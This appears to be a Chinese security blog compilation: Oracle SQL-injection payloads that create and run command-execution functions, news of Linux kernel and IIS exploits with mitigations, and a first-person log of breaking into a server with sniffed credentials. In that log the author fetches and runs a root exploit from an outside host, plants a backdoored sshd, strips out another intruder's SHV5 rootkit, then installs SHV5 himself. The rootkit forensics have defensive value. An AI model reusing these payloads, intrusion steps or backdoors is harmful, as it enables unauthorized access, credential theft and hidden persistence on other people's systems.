select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual ;

select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual ;

select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual ;

select  sys.LinxRunCMD('/bin/cat /etc/issue') from dual ;

各种linux发行版时间轴

又不消停了，IIS remote和又一个Kernel local

前不久刚爆出Linux Kernel的高危local root漏洞，几乎通杀所有内核：

Linux Kernel 2.x sock_sendpage() Local Ring0 Root Exploit
Linux Kernel 2.x sock_sendpage() Local Root Exploit #2
Linux Kernel 2.x sock_sendpage() Local Root Exploit (Android Edition)
Linux Kernel 2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver)
Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit (ppc)

详情和修补方案见：http://blog.vfocus.net/archives/000660.html

现在又出了一个32位2.6->2.6.19的，现在还没解决方案，只能等，已知在32位，2.6内核的Centos RHEL 4.x，5.x上以及Fedora Core 4/5/6等上测试成功：

Linux Kernel 2.6 < 2.6.19 (32bit) ip_append_data() ring0 Root Exploit

[root@aaa ~]# getenforce
Enforcing

这个的能成功

[root@aaa ~]# getenforce
Disabled

的都会报错：[-] mmap(): Permission denied

同时IIS也出了个ftpd的远程高危漏洞，5和6的0day：

Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k)

各位管理员也该停的停了吧，这2个现在都没临时的解决方案，只能等待。

Linux Kernel再出高危漏洞，赶紧补丁

上周黑客爆出Linux Kernel的高危local root漏洞，周末exp出来了：

http://www.milw0rm.com/exploits/9435
http://www.milw0rm.com/exploits/9436

经测试各种系统都有问题，即使开启了SELinux了也不行。临时修复方案：

1、使用Grsecurity或者Pax内核安全补丁，并开启KERNEXEC防护功能。

2、升级到2.6.31-rc6或2.4.37.5以上的内核版本。

3、如果您使用的是RedHa tEnterprise Linux 4/5的系统或Centos4/5的系统，您可以通过下面的操作简单的操作防止被攻击。

在/etc/modprobe.conf文件中加入下列内容：

install pppox /bin/true
install bluetooth /bin/true
install appletalk /bin/true
install ipx /bin/true
install sctp /bin/true

执行/sbin/lsmod | grep -e ppp -e blue -e app -e ipx -e sct，如果没有输出，你不需要重启，如果有输出，你需要重启系统，才可以对此攻击免疫。

4、如果您使用的是Debian或Ubuntu系统，您可以通过下面的操作防止被攻击

cat > /etc/modprobe.d/mitigate-2692.conf << EOM
install ppp_generic /bin/true
install pppoe /bin/true
install pppox /bin/true
install slhc /bin/true
install bluetooth /bin/true
install ipv6 /bin/true
install irda /bin/true
install ax25 /bin/true
install x25 /bin/true
install ipx /bin/true
install appletalk /bin/true
EOM
/etc/init.d/bluez-utils stop

我的一台linux肉鸡的简单手工入侵检测过程

by:vitter
blog:blog.securitycn.net

今天发现一台肉鸡上某人的ssh连到另外一台服务器上，记录下了密码。

[root@mail ~]# cat /tmp/sshpswd
ldc:sle823jfsGs@222.222.66.11

直接ssh上去。

[root@mail ~]# ssh ldc@222.222.66.11
ldc@222.222.66.11's password:
Last login: Fri Jul 17 13:11:38 2009 from 221.140.140.200
[ldc@localhost ldc]$ cat /etc/issue
Red Hat Enterprise Linux Server release 5 (Tikanga)
Kernel \r on an \m

[ldc@localhost ldc]$ uname -a
Linux localhost.localdomain 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686 i686 i386 GNU/Linux

是rhel5.0没升级过内核，vmsplice的local root应该可以的，不过测试了下，机器挂了，换udev的好了。

[ldc@localhost ldc]$ mkdir .v
[ldc@localhost ldc]$ cd .v
[ldc@localhost .v]$ wget http://211.100.50.70/u.sh
--13:21:09--  http://211.100.50.70/u.sh
Connecting to 211.100.50.70:80... 宸茶繛鎺ャ�
宸插彂鍑?HTTP 璇锋眰锛屾�ｅ湪绛夊緟鍥炲�?.. 200 OK
闀垮害锛?366 (3.3K) [application/x-sh]
Saving to: `u.sh'

100%[===========================================================================================>] 3,366       --.-K/s   in 0.04s 

13:21:09 (93.7 KB/s) - `u.sh' saved [3366/3366]

[ldc@localhost .v]$ ls
r00t    r00t.c  u.sh
[ldc@localhost .v]$ chmod +x u.sh
[ldc@localhost .v]$ cat /proc/net/netlink
sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
f69f8800 0   2486   00000111 0        0        00000000 2
f7fdae00 0   0      00000000 0        0        00000000 2
c2132200 6   0      00000000 0        0        00000000 2
f6a57a00 7   2143   00000001 0        0        00000000 2
f7caf000 7   0      00000000 0        0        00000000 2
f6a0be00 9   2143   00000000 0        0        00000000 2
f6a61200 9   1996   00000000 0        0        00000000 2
f7de1c00 9   0      00000000 0        0        00000000 2
f7d6ca00 10  0      00000000 0        0        00000000 2
f7fb3200 11  0      00000000 0        0        00000000 2
c2154200 15  476    ffffffff 0        0        00000000 2
f7fdac00 15  0      00000000 0        0        00000000 2
f7fb3000 16  0      00000000 0        0        00000000 2
c21cde00 18  0      00000000 0        0        00000000 2
[ldc@localhost .v]$ ps aux | grep udev
root       477  0.0  0.0  2916 1396 ?        S<   12:36   0:00 /sbin/udevd -d
ldc       3462  0.0  0.0  4128  680 pts/0    S    13:00   0:00 grep udev
[ldc@localhost .v]$ sh u.sh 476
suid.c: 鍦ㄥ嚱鏁?鈥榤ain鈥?涓�锛�
suid.c:3: 璀﹀憡锛氶殣寮忓０鏄庝笌鍐呭缓鍑芥暟 鈥榚xecl鈥?涓嶅吋瀹

sh-3.1# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh

已经是root权限了。

sh-3.1# w
13:25:18 up 48 min,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
ldc      pts/0    100.204.107.20    13:05    0.00s  0.12s  0.06s sshd: ldc [priv]
sh-3.1# pwd
/home/ldc/.v
sh-3.1# ssh -V
OpenSSH_4.3p2, OpenSSL 0.9.8b 04 May 2006

我们先留个ssh的后门。

sh-3.1# wget http://211.100.50.70/openssh4.3p2.tar.gz
--13:32:08--  http://211.100.50.70/openssh4.3p2.tar.gz
Connecting to 211.100.50.70:80... 宸茶繛鎺ャ�
宸插彂鍑?HTTP 璇锋眰锛屾�ｅ湪绛夊緟鍥炲�?.. 200 OK
闀垮害锛?79990 (957K) [application/x-gzip]
Saving to: `openssh4.3p2.tar.gz'

100%[===========================================================================================>] 979,990     1.14M/s   in 0.8s  

13:32:08 (1.14 MB/s) - `openssh4.3p2.tar.gz' saved [979990/979990]

sh-3.1# tar zxf openssh4.3p2.tar.gz
sh-3.1# cd openssh-4.3p2/
sh-3.1# ./configure --prefix=/usr --sysconfdir=/etc/ssh
checking for gcc... gcc
checking for C compiler default output file name... a.out
............（省略若干行）

sh-3.1# make && make install
conffile=`echo sshd_config.out | sed 's/.out$//'`; \
        /bin/sed -e 's|/etc/ssh/ssh_prng_cmds|/etc/ssh/ssh_prng_cmds|g' -e
............（省略若干行）

sh-3.1# cp ssh_config sshd_config /etc/ssh/
sh-3.1# /etc/rc.d/init.d/sshd restart
鍋滄�� sshd锛                                              [纭�瀹歖
鍚�鍔� sshd锛                                              [纭�瀹歖

ok了，用我们的sshdoor登录。

[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh

[root@localhost ~]# netstat -lntp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name  
tcp        0      0 127.0.0.1:2208              0.0.0.0:*                   LISTEN      2298/hpiod         
tcp        0      0 0.0.0.0:1000                0.0.0.0:*                   LISTEN      2090/rpc.statd     
tcp        0      0 0.0.0.0:111                 0.0.0.0:*                   LISTEN      2056/portmap       
tcp        0      0 0.0.0.0:21                  0.0.0.0:*                   LISTEN      2883/vsftpd        
tcp        0      0 127.0.0.1:631               0.0.0.0:*                   LISTEN      2315/cupsd         
tcp        0      0 127.0.0.1:25                0.0.0.0:*                   LISTEN      2361/sendmail: acce    
tcp        0      0 127.0.0.1:2207              0.0.0.0:*                   LISTEN      2303/python            

总感觉这系统怪怪的，连22端口都看不到，应该替换了netstat了，先看看有没有其他被替换掉的系统文件吧。

[root@localhost ~]# rpm -qaV
S.5..UG.   /bin/netstat
S.5..UG.   /sbin/ifconfig
S.5....T   /usr/bin/ssh-keygen
S.5....T c /etc/sysconfig/system-config-securitylevel
S.5..UG.   /usr/sbin/lsof
.M......   /var/tux
S.5....T c /etc/inittab
S.5....T   /usr/share/texmf-var/fonts/map/dvipdfm/updmap/dvipdfm_dl14.map
S.5....T   /usr/share/texmf-var/fonts/map/dvipdfm/updmap/dvipdfm_ndl14.map
S.5....T   /usr/share/texmf-var/fonts/map/pdftex/updmap/pdftex_dl14.map
S.5....T   /usr/share/texmf-var/fonts/map/pdftex/updmap/pdftex_ndl14.map
S.5....T   /usr/share/texmf-var/web2c/aleph.fmt
S.5....T   /usr/share/texmf-var/web2c/amstex.fmt
S.5....T   /usr/share/texmf-var/web2c/bamstex.fmt
S.5....T   /usr/share/texmf-var/web2c/bplain.fmt
S.5....T   /usr/share/texmf-var/web2c/cont-en.fmt
S.5....T   /usr/share/texmf-var/web2c/etex.fmt
..5....T   /usr/share/texmf-var/web2c/metafun.mem
S.5....T   /usr/share/texmf-var/web2c/mf.base
..5....T   /usr/share/texmf-var/web2c/mpost.mem
S.5....T   /usr/share/texmf-var/web2c/mptopdf.fmt
S.5....T   /usr/share/texmf-var/web2c/omega.fmt
S.5....T   /usr/share/texmf-var/web2c/pdfetex.fmt
S.5....T   /usr/share/texmf-var/web2c/pdftex.fmt
S.5....T   /usr/share/texmf-var/web2c/tex.fmt
.......T c /etc/kdump.conf
S.5....T c /etc/printcap
..5....T c /etc/pki/nssdb/secmod.db
....L... c /etc/pam.d/system-auth
.M...... c /etc/cups/classes.conf
.......T c /etc/audit/auditd.conf
missing     /usr/sbin/nscd
S.5....T c /etc/sysconfig/named
.M......   /var/named
SM5..UG.   /bin/ps
SM5..UG.   /usr/bin/top
SM5....T c /etc/sysconfig/iptables-config
S.5..UG.   /usr/bin/find
prelink: /usr/lib/libGL.so.1.2.#prelink#.crFdQJ Could not trace symbol resolving
S.?.....   /usr/lib/libGL.so.1.2
S.5....T c /etc/ppp/chap-secrets
S.5....T c /etc/ppp/pap-secrets
S.5....T c /etc/xml/catalog
S.5....T c /usr/share/sgml/docbook/xmlcatalog
S.5....T c /etc/ssh/ssh_config
S.5....T   /usr/bin/scp
S.5....T   /usr/bin/sftp
S.5....T   /usr/bin/ssh
S.5....T   /usr/bin/ssh-add
SM5...GT   /usr/bin/ssh-agent
S.5....T   /usr/bin/ssh-keyscan
S.5....T   /usr/share/texmf-var/fonts/map/dvips/updmap/builtin35.map
S.5....T   /usr/share/texmf-var/fonts/map/dvips/updmap/download35.map
S.5....T   /usr/share/texmf-var/fonts/map/dvips/updmap/ps2pk.map
S.5....T   /usr/share/texmf-var/fonts/map/dvips/updmap/psfonts_pk.map
S.5....T   /usr/share/texmf-var/fonts/map/dvips/updmap/psfonts_t1.map
S.5....T   /etc/sgml/docbook-slides.cat
S.5....T   /usr/share/icons/hicolor/icon-theme.cache
S.5..UG.   /bin/ls
S.5..UG.   /usr/bin/dir
S.5..UG.   /usr/bin/md5sum
S.5..UG.   /usr/bin/pstree
S.5....T c /etc/syslog.conf
S.5....T c /etc/ssh/sshd_config
S.5....T   /usr/sbin/sshd
missing     /var/lib/texmf/ls-R
S.5....T   /etc/sgml/docbook-simple.cat
S.5....T c /etc/vsftpd/vsftpd.conf
.M......   /var/ftp/pub
S.5....T c /etc/mailcap
......G.   /var/cache/samba/winbindd_privileged
.......T c /etc/mail/sendmail.cf
SM5....T c /etc/mail/submit.cf
S.5....T c /var/log/mail/statistics
..5....T c /usr/lib/security/classpath.security
S.5....T c /etc/sane.d/dll.conf

还好rpm没替换，看来系统的好些命令被替换了，嘿嘿，有同行在啊。
不好意思，那我就要T你下去了。下面先检查一下，当然这个系统不可靠了，我们先替换回可靠的命令：

[root@localhost bin]# cp -f /home/ldc/.v/dir /usr/bin/dir
cp: cannot remove `/usr/bin/dir': Operation not permitted

chattr加了iau了。

[root@localhost bin]# chattr -iau /usr/bin/dir
[root@localhost bin]# cp -f /home/ldc/.v/dir /usr/bin/dir

ok了。看看还有什么吧：

[root@localhost chkrootkit-0.48]# lsattr /bin /sbin /usr/bin /usr/sbin /etc| grep -e -ia
s---ia------- /bin/ps
s---ia------- /bin/ls
s---ia------- /bin/netstat
s---ia------- /sbin/ifconfig
s---ia------- /sbin/ttymon
s---ia------- /sbin/ttyload
s---ia------- /usr/bin/top
s---ia------- /usr/bin/md5sum
s---ia------- /usr/bin/pstree.x11
s---ia------- /usr/bin/find
s---ia------- /usr/bin/dir
s---ia------- /usr/bin/pstree
s---ia------- /usr/sbin/lsof
s---ia------- /usr/sbin/ttyload
s---ia------- /etc/sh.conf
[root@localhost bin]# chattr -iau ps ls netstat
[root@localhost bin]# rm -rf ps ls netstat
[root@localhost bin]# rz
rz waiting to receive.奫root@localhost bin]# chmod +x ps ls netstat
[root@localhost bin]# chattr +iau ps ls netstat

同样的方式把/usr/sbin/lsof、/usr/bin/find等都替换回来。
再用netstat看看端口吧：
[root@localhost bin]# netstat -lntp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name  
tcp        0      0 127.0.0.1:2208              0.0.0.0:*                   LISTEN      2298/hpiod         
tcp        0      0 0.0.0.0:1000                0.0.0.0:*                   LISTEN      2090/rpc.statd     
tcp        0      0 0.0.0.0:111                 0.0.0.0:*                   LISTEN      2056/portmap       
tcp        0      0 0.0.0.0:21                  0.0.0.0:*                   LISTEN      2883/vsftpd        
tcp        0      0 127.0.0.1:631               0.0.0.0:*                   LISTEN      2315/cupsd         
tcp        0      0 127.0.0.1:25                0.0.0.0:*                   LISTEN      2361/sendmail: acce
tcp        0      0 0.0.0.0:65530               0.0.0.0:*                   LISTEN      2663/ttyload       （有东东出来了吧）
tcp        0      0 127.0.0.1:2207              0.0.0.0:*                   LISTEN      2303/python        
tcp        0      0 :::22                       :::*                        LISTEN      13935/sshd       

现在再用chkrootkit和rkhunter查一下看看：

[root@localhost .v]# ls
chkrootkit-0.48  chkrootkit.tar.gz  rkhunter  rkhunter-1.2.7.tar.gz
[root@localhost .v]# cd chkrootkit-0.48/
[root@localhost chkrootkit-0.48]# ./chkrootkit
ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not infected
............（省略若干行）
Checking `ifconfig'... INFECTED
............（省略若干行）
Checking `pstree'... INFECTED
............（省略若干行）
Checking `top'... INFECTED
............（省略若干行）
Searching for t0rn's v8 defaults... Possible t0rn v8 \(or variation\) rootkit installed
............（省略若干行）
Searching for Showtee... Warning: Possible Showtee Rootkit installed 
............（省略若干行）
Searching for Romanian rootkit...  /usr/include/file.h /usr/include/proc.h
............（省略若干行）

上面几行都是有问题的。
下面用rkhunter，它的log存在/var/log/rkhunter.log里面

[root@localhost rkhunter]# /usr/local/bin/rkhunter -c --createlogfile

Rootkit Hunter 1.2.7 is running

Determining OS... Unknown
Warning: This operating system is not fully supported!
Warning: Cannot find md5_not_known
All MD5 checks will be skipped!  （md5sum被替换了）
............（省略若干行）
   Rootkit 'SHV4'...                                          [ Warning! ]             （SHV4）

             --------------------------------------------------------------------------------
             Found parts of this rootkit/trojan by checking the default files and directories
             Please inspect the available files, by running this check with the parameter
             --createlogfile and check the log file (current file: /var/log/rkhunter.log).
             --------------------------------------------------------------------------------

[Press <ENTER> to continue]

   Rootkit 'SHV5'...                                          [ Warning! ]             （SHV5）

             --------------------------------------------------------------------------------
             Found parts of this rootkit/trojan by checking the default files and directories
             Please inspect the available files, by running this check with the parameter
             --createlogfile and check the log file (current file: /var/log/rkhunter.log).
             --------------------------------------------------------------------------------
............（省略若干行）
Scanning took 84 seconds
Scan results written to logfile (/var/log/rkhunter.log)

-----------------------------------------------------------------------

Do you have some problems, undetected rootkits, false positives, ideas
or suggestions?
Please e-mail me by filling in the contact form (@http://www.rootkit.nl)

-----------------------------------------------------------------------

下面我们看下log：

[root@localhost rkhunter]# cat /var/log/rkhunter.log
[15:16:51] Running Rootkit Hunter 1.2.7 on localhost.localdomain
[15:16:51]
Rootkit Hunter 1.2.7, Copyright 2003-2005, Michael Boelen
............（省略若干行）
[15:16:55] *** Start scan SHV4 ***
[15:16:55]   - File /etc/ld.so.hash... OK. Not found.
[15:16:55]   - File /lib/libext-2.so.7... OK. Not found.
[15:16:55]   - File /lib/lidps1.so... WARNING! Exists.  （找到一个文件）
[15:16:55]   - File /usr/sbin/xntps... OK. Not found.
[15:16:55]   - Directory /lib/security/.config... OK. Not found.
[15:16:55]   - Directory /lib/security/.config/ssh... OK. Not found.
[15:17:04] *** Start scan SHV5 ***
[15:17:04]   - File /etc/sh.conf... WARNING! Exists.   （找到一个文件）
[15:17:04]   - File /dev/srd0... OK. Not found.
[15:17:04]   - Directory /usr/lib/libsh... WARNING! Exists.  （找到一个目录）
............（省略若干行）

下面手工核对下，因为工具都是对已有的检查，如果改过的，他就找不到了。

[root@localhost sbin]# netstat -anp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name  
tcp        0      0 0.0.0.0:65530               0.0.0.0:*                   LISTEN      2663/ttyload       
............（省略若干行）
raw        0      0 0.0.0.0:1                   0.0.0.0:*                   7           2679/ttymon        
............（省略若干行）

发现2个不正常的
[root@localhost sbin]# ps aux|grep 2663
root      2663  0.0  0.0   2128   516 ?        Ss   12:37   0:00 /sbin/ttyload -q   （原型出来了）
root     15350  0.0  0.0   4088   604 pts/0    S+   15:21   0:00 grep 2663
[root@localhost sbin]# lsof -p 2663
COMMAND  PID USER   FD   TYPE DEVICE    SIZE     NODE NAME
3       2663 root  cwd    DIR  253,0    4096        2 /
3       2663 root  rtd    DIR  253,0    4096        2 /
3       2663 root  txt    REG  253,0  652620 34897965 /tmp/sh-AQJ3OQYACSO (deleted)  （是个压缩的）
3       2663 root  mem    REG  253,0  121684  8586729 /lib/ld-2.5.so
3       2663 root  mem    REG  253,0 1576952  8586730 /lib/libc-2.5.so
3       2663 root  mem    REG  253,0  101036  8586743 /lib/libnsl-2.5.so
3       2663 root  mem    REG  253,0   15264  8586757 /lib/libutil-2.5.so
3       2663 root  mem    REG  253,0   27836  8585303 /lib/libcrypt-2.5.so
3       2663 root    0u   CHR    1,3             1517 /dev/null
3       2663 root    1u   CHR    1,3             1517 /dev/null
3       2663 root    2u   CHR    1,3             1517 /dev/null
3       2663 root    3u  IPv4   9895              TCP *:65530 (LISTEN)
[root@localhost sbin]# lsof -p 2679
COMMAND  PID USER   FD   TYPE DEVICE    SIZE    NODE NAME
ttymon  2679 root  cwd    DIR  253,0    4096       2 /
ttymon  2679 root  rtd    DIR  253,0    4096       2 /
ttymon  2679 root  txt    REG  253,0   93476  852119 /sbin/ttymon
ttymon  2679 root  mem    REG  253,0   46740 8585257 /lib/libnss_files-2.5.so
ttymon  2679 root  mem    REG  253,0  121684 8586729 /lib/ld-2.5.so
ttymon  2679 root  mem    REG  253,0 1576952 8586730 /lib/libc-2.5.so
ttymon  2679 root    3u   raw                   9925 00000000:0001->00000000:0000 st=07

监听65530端口的是个ssh后门：

[root@localhost sbin]# nc 127.0.0.1 65530
SSH-1.5-2.0.13

Protocol mismatch.

密码应该在：

[root@localhost sbin]# cat /etc/sh.conf
76800957735704ee3dd8ac42779db49a  -

加密了，我们再看看另外一个配置文件：

[root@localhost sbin]# cat /lib/lidps1.so
ttyload
shsniff
shp
shsb
hide
burim
synscan
mirkforce
ttymon
sh2-power

看来是ps的配置文件。

看看另外一个进程：

[root@localhost sbin]# strings /sbin/ttymon
............（省略若干行）
Usage: %s <dst> <src> <size> <number>
Ports are set to send and receive on port 179
dst:    Destination Address
src:    Source Address
size:   Size of packet which should be no larger than 1024 should allow for xtra header info thru routes
num:    packets
Could not resolve %s fucknut

根据这个Google了下，应该是个dos工具。感兴趣的可以编译下玩玩看看：http://www.securityfocus.com/archive/82/334848这里有。

ok我们现在进入黑客的老巢：

[root@localhost sbin]# cd /usr/lib/libsh
[root@localhost libsh]# ls -al
total 140
drwxr-xr-x   6 root  root   4096 Dec 18  2008 .
drwxr-xr-x 118 root  root  69632 Jul 17 13:55 ..
drwxr-xr-x   2 root  root   4096 Dec 18  2008 .backup
-rwxr-xr-x   1   122   114  1206 Apr 18  2003 .bashrc
-rwxr-xr-x   1   122   114  2000 Nov 28  2006 hide
drwxr-xr-x   2 root  root   4096 Dec 18  2008 .owned
-rwxr-xr-x   1   122   114  1345 Nov 28  2006 shsb
drwxr-xr-x   2 root  root   4096 Jul 14 04:03 .sniff
drwxr-xr-x   2 gaobo gaobo  4096 Nov 28  2006 utilz
[root@localhost libsh]# ls .backup/
dir  find  ifconfig  ls  lsof  md5sum  netstat  ps  pstree  top
上面就是我们系统备份的文件，直接恢复即可。

find搜下其他的配置文件。此步骤省略。最后都找到了：

[root@localhost libsh]# find / -nouser
/lib/libsh.so/shhk.pub
/lib/libsh.so/shhk
/lib/libsh.so/shrs
............（省略若干行）

[root@localhost libsh]# cd /lib/libsh.so/
[root@localhost libsh.so]# ls
bash  shdcf  shhk  shhk.pub  shrs

这个目录是ssh的配置文件
其他的用关键字就可以了：如find / -name "*" -exec grep -l "ttyload" {} \;

[root@localhost lib]# cat /usr/include/proc.h
3 burim
3 mirkforce
3 synscan
3 ttyload
3 shsniff
3 ttymon
3 shsb
3 shp
3 hide
4 ttyload
[root@localhost lib]# cat /usr/include/file.h
sh.conf
libsh
.sh
system
shsb
libsh.so
shp
shsniff
srd0
[root@localhost lib]# cat /usr/include/hosts.h
2 212.110
2 195.26
2 194.143
2 62.220
3 2002
4 2002
3 6667
4 6667
3 65530
4 65530
[root@localhost lib]# cat /usr/include/log.h
mirkforce
synscan
syslog

那看看他怎么启动的：
[root@localhost lib]# cat /etc/inittab
#
# inittab       This file describes how the INIT process should set up
#               the system in a certain run-level.
#
# Author:       Miquel van Smoorenburg, <miquels@drinkel.nl.mugnet.org>
#               Modified for RHS Linux by Marc Ewing and Donnie Barnes
#

# Default runlevel. The runlevels used by RHS are:
#   0 - halt (Do NOT set initdefault to this)
#   1 - Single user mode
#   2 - Multiuser, without NFS (The same as 3, if you do not have networking)
#   3 - Full multiuser mode
#   4 - unused
#   5 - X11
#   6 - reboot (Do NOT set initdefault to this)
#
id:5:initdefault:

# System initialization.
si::sysinit:/etc/rc.d/rc.sysinit

l0:0:wait:/etc/rc.d/rc 0
l1:1:wait:/etc/rc.d/rc 1
l2:2:wait:/etc/rc.d/rc 2
l3:3:wait:/etc/rc.d/rc 3
l4:4:wait:/etc/rc.d/rc 4
l5:5:wait:/etc/rc.d/rc 5
l6:6:wait:/etc/rc.d/rc 6

# Trap CTRL-ALT-DELETE
ca::ctrlaltdel:/sbin/shutdown -t3 -r now

# When our UPS tells us power has failed, assume we have a few minutes
# of power left.  Schedule a shutdown for 2 minutes from now.
# This does, of course, assume you have powerd installed and your
# UPS connected and working correctly. 
pf::powerfail:/sbin/shutdown -f -h +2 "Power Failure; System Shutting Down"

# If power was restored before the shutdown kicked in, cancel it.
pr:12345:powerokwait:/sbin/shutdown -c "Power Restored; Shutdown Cancelled"

# Run xdm in runlevel 5
x:5:respawn:/etc/X11/prefdm -nodaemon
# Loading standard ttys
0:2345:once:/usr/sbin/ttyload        （在这里了）
# Run gettys in standard runlevels
1:2345:respawn:/sbin/mingetty tty1
2:2345:respawn:/sbin/mingetty tty2
3:2345:respawn:/sbin/mingetty tty3
4:2345:respawn:/sbin/mingetty tty4
5:2345:respawn:/sbin/mingetty tty5
6:2345:respawn:/sbin/mingetty tty6

# modem getty.
# mo:235:respawn:/usr/sbin/mgetty -s 38400 modem

# fax getty (hylafax)
# mo:35:respawn:/usr/lib/fax/faxgetty /dev/modem

# vbox (voice box) getty
# I6:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI6
# I7:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI7

# end of /etc/inittab

看看他的启动文件：

[root@localhost lib]# cat /usr/sbin/ttyload
/sbin/ttyload -q >/dev/null 2>&1
/sbin/ttymon >/dev/null 2>&1

以上除了工具，我们通过手工的方式对rootkit进行了一些简单的分析，这个是个没有修改过的SHV5。以上只是一些思路，在对待入侵问题上要具体问题具体分析，这个相对简单了点。

下面我们测试下这个SHV5：

[root@localhost .v]# wget http://211.100.50.70/shv5.tar.gz

解压、安装：

[root@localhost .v]# tar zxf shv5.tar.gz
[root@localhost .v]# cd shv5
[root@localhost shv5]# ls
bin.tgz  conf.tgz  lib.tgz  README  setup  utilz.tgz
[root@localhost shv5]# cat README
############
### shv5 ###
############

                   MMMMMMM                                   MMMMMMMMMMMMMMM  
                   MMMMMMM                                   MMMMMMMMMMMMMMM  
                   MMMMMMM                                   MMMMMMMMMMMMMMM  
                   MMMMMMM                                   MMMMMMMMMMMMMMM  
                   MMMMMMM                                   MMMMMM           
           MMMMMM  MMMMMMMMMMMMMMMM     MMMMMMM    MMMMMMM   MMMMMM           
         MMMMMMMM  MMMMMMMMMMMMMMMMM    MMMMMMM    MMMMMMM   MMMMMMMMMMMM     
        MMMMMMMMM  MMMMMMMMMMMMMMMMMM   MMMMMMM    MMMMMMM   MMMMMMMMMMMMMM   
       MMMMMMMMMM  MMMMMMMMMMMMMMMMMM   MMMMMMM    MMMMMMM        MMMMMMMMMM  
       MMMMMMM     MMMMMMM    MMMMMMM   MMMMMMM    MMMMMMM          MMMMMMMM  
       MMMMMMM     MMMMMMM    MMMMMMM    MMMMMM    MMMMMM            MMMMMMMM 
       MMMMMMM     MMMMMMM    MMMMMMM    MMMMMMM  MMMMMMM            MMMMMMMM 
    MMMMMMMMMM     MMMMMMM    MMMMMMM     MMMMMMMMMMMMMM    MMM     MMMMMMMM  
  MMMMMMMMMMM      MMMMMMM    MMMMMMM      MMMMMMMMMMMMM    MMMMMMMMMMMMMMMM  
MMMMMMMMMMM       MMMMMMM    MMMMMMM       MMMMMMMMMMM     MMMMMMMMMMMMMMM   
MMMMMMMMMM        MMMMMMM    MMMMMMM        MMMMMMMMM      MMMMMMMMMMMMM     
MMMMMMMM          MMMMMMM    MMMMMMM          MMMMM            MMMMMMM       

DISCLAIMER:

* The purpose of these coded instructions, statements and computer
* programs is for TEST AIMS ONLY !
* Their use/misuse is at USERS OWN RISK !
* We do not take any responsibility for any harm or damage caused
* by the use of this file-package.
* This includes copying, duplicating or modifying it in any form !

* USERS WHO USE THIS CODED INSTRUCTIONS, STATEMENTS AND COMPUTER
* PROGRAMS MUST ACCEPT ALL ABOVE STATEMENTS !
* OTHERWISE U ARE OBLIGED TO DELETE THESE FILES IMEDIATELY !

CHANGES [shv5]:

-> - new sshd backdor with env-settings (avoids history logging)
   - The new sshd is in between 1.2.25-2.0.13 SSHD (from ssh.com)
   - not so big and with new great features designed to suite shv5.
-> new rk-dirs coz of lamme anti-shv4 release
-> new security-checks on the script
   - latest flaws included (mod_ssl, samba, sendmail etc..)
-> setup-script rewriten to become more soft (friendly)
-> added new addons (tripwire, snort ... fucker :))
-> added basic utilz on rootkit (i hate dld them on each box)
-> we use md5sum passwords now (more l33t and secure)

USAGE:

-> - If u expect me to tell you how/what/if/when/where type of
   - questions delete these files imediately! This is not for you!

TODO:

-> tcpdump trojan
-> crontab trojan
-> sendmail backdoor
-> ftp backdoor
-> httpd backdoor
-> any other idea ?!?!?! < mail: pint@dosnet.info >

[root@localhost shv5]# ./setup sshdoor 8585
[sh]# Installing shv5 ... this wont take long
[sh]# If u think we will patch your holes shoot yourself !
[sh]# so patch manualy and fuck off!

============================================================================

MMMMM                           MMMMMM                            
MMM    MMMMMMMMM   MMMM    MMMM    MMM   [*] Presenting u shv5-rootkit ! 
MMM   MMMM   MMMM  MMMM    MMMM    MMM   [*] Designed for internal use ! 
MMM   MMMMMMM      MMMMMMMMMMMM    MMM                                   
MMM     MMMMMMMM   MMMMMMMMMMMM    MMM   [*] brought to you by: PinT[x]  
MMM          MMMM  MMMM    MMMM    MMM   [*] April ) 2003 )              
MMM   MMMM   MMMM  MMMM    MMMM    MMM                                   
MMM    MMMMMMMMM   MMMM    MMMM    MMM   [*]    *** VERY PRIVATE ***     
MMM                                MMM   [*] *** so dont distribute ***  
MMMMM       -C- -R- -E- -W-     MMMMMM                                   

============================================================================

[sh]# backdooring started on localhost.localdomain
[sh]#                                                                 
[sh]#                                                                 
[sh]# checking for remote logging...   guess not.
[sh]# checking for tripwire...  guess not.
[sh]# [Installing trojans....]                                        
[sh]#  Using Password : sshdoor                                      
[sh]#         Using ssh-port : 8585                                
